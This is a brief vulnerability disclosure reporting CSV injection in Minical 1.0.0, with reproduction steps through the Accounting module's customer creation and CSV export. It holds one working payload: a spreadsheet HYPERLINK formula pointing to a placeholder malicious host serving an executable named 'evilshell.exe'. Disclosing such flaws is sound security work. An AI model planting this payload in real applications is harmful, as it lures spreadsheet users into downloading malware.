Minical 1.0.0 is vulnerable to CSV Injection.
Vendor: https://github.com/minical/minical
Demo Application: https://demo.minical.io/
Step 1: Navigate to the Accounting module and click on Create New Customer.
Step 2: Enter the payload in the Name field and Click on Create.
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")
Step 3: Click on Download CSV Report and Observe the payload getting rendered.